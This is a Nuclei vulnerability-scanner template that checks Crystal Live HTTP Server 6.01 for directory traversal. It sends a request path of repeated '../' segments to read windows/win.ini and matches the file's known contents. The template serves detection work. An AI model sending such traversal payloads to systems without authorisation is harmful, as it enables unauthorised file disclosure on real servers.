nuclei-templates/vulnerabilities/other/crystal-live-server-lfi.yaml

23 lines
485 B
YAML

id: crystal-live-server-lfi
info:
name: Crystal Live HTTP Server 6.01 - Directory Traversal
author: 0x_Akoko
severity: high
reference: https://cxsecurity.com/issue/WLB-2019110127
tags: lfi,crystal
requests:
- method: GET
path:
- "{{BaseURL}}/../../../../../../../../../../../../windows/win.ini"
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and